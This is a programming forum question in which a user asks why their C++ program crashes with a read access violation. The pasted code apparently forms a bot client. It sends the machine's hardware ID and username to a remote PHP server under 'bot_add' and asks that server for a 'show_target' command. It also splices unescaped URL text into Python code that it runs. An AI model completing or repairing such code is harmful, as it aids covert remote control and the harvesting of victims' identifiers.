Answer the question
In order to leave comments, you need to log in
What is this error Unhandled exception thrown: read access violation. _Pnext was 0xCCCCCCD0.?
THE ERROR MUST BE HERE SOMEWHERE:
string request(string url, string data) {//скорее всего причина багов
string url_r = url + "?" + data;
return python_shell(code_normalization("from requests import get\nget('" + url_r + "')"));
}
string execution_receiving_target(string url, string hwid) {
cout << "lol1" << endl;
string code = request(url, "function=show_target&hwid=" + hwid);
cout << code.c_str() << endl;
return NULL;
}
int main(){
string url = "http://sito.com/main.php";
string hwid = get_hwid();
string username = get_username();
if (is_internet(url) == "1") {
cout << "lol" << endl;
request(url, "function=bot_add&hwid=" + hwid + "&username=" + username);//НЕ работает
execution_receiving_target(url, hwid);//НЕ работает
cin.get();
}
return NULL;
}
Answer the question
In order to leave comments, you need to log in
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question